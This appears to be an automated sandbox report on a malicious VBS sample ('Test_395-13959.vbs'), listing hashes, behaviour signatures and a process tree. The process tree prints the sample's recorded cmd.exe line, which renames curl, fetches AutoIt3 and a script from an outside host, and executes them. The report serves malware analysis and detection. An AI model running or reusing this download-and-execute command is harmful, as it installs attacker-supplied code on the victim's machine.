Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
04-10-2023 13:53
Static task
static1
Behavioral task
behavioral1
Sample
Test_395-13959.vbs
Resource
win7-20230831-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Test_395-13959.vbs
-
Size
6.9MB
-
MD5
5a9c56d5b6a4ae5fc402d99fa45f5598
-
SHA1
d1572724ca4ecc99edaf4104f51385265bb27682
-
SHA256
961372719771b69d8cf4d62f2b3703d7322544d16dc08036a217102382200498
-
SHA512
5c9ab4ba5c102217077e6b4981f99c1bbf7e0a1842bfe38edcaa5e5b59d3c7bc11a8954eb8917d05dc7addc4023fbc0758e7ed2ddcce861503ff940fcad93e57
-
SSDEEP
49152:jzgZNELkkGo137QXFsHKCaEcFMICJ/r1lHszS6rY7fch38ZkcwMKvmLXhEbvYrTJ:t
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2244 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2284 2244 WScript.exe 28 PID 2244 wrote to memory of 2284 2244 WScript.exe 28 PID 2244 wrote to memory of 2284 2244 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Test_395-13959.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\omxg & cd /d c:\omxg & copy c:\windows\system32\curl.exe omxg.exe & omxg -H "User-Agent: curl" -o Autoit3.exe http://getldrrgoodgame.com:2351 & omxg -o xqkbij.au3 http://getldrrgoodgame.com:2351/msiomxgnyqu & Autoit3.exe xqkbij.au32⤵PID:2284
-